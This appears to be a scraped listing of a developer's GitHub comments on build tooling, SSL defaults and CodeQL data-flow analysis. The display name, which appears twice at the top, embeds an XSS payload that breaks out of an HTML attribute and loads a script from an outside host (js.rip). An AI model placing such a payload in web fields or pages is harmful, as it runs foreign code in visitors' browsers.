Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 594 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

I ended up shelling out to maven to do the code generation for this. Really didn't like this solution but it's the best one I could come up with.

I have also experienced this problem. I am dynamically adding images using angular and this is creating problems.

> Rationale: Importing all classes from a package or static members from a class leads to tight coupling between packages or classes and might lead to problems when a new...

The version of the Gradle wrapper you are using _may_ not be supported (unsupported range is 3.5 to 4.0) so you may have to update by at least one minor...

I 100% recommend adding a method like the following as `simpleSecure()`. (Mine is written in Kotlin, obvious this would be translated to Java) ```kotlin private fun defaultSSLEngineForClient(): Func1 { val...

'Allow edits from maintainers' should be checked

The string wasn't modified at all, I think that no change should have been generated as there was no parameterization performed here

Likely easier to setup a call. I'm going on vacation next Tuesday for 10 days though. https://calendly.com/jonathan-leitschuh-at-open-source-security-foundation Please also take a look at the talk I gave on this topic...

Also, this document explains the concepts behind what Data Flow is: https://codeql.github.com/docs/writing-codeql-queries/about-data-flow-analysis/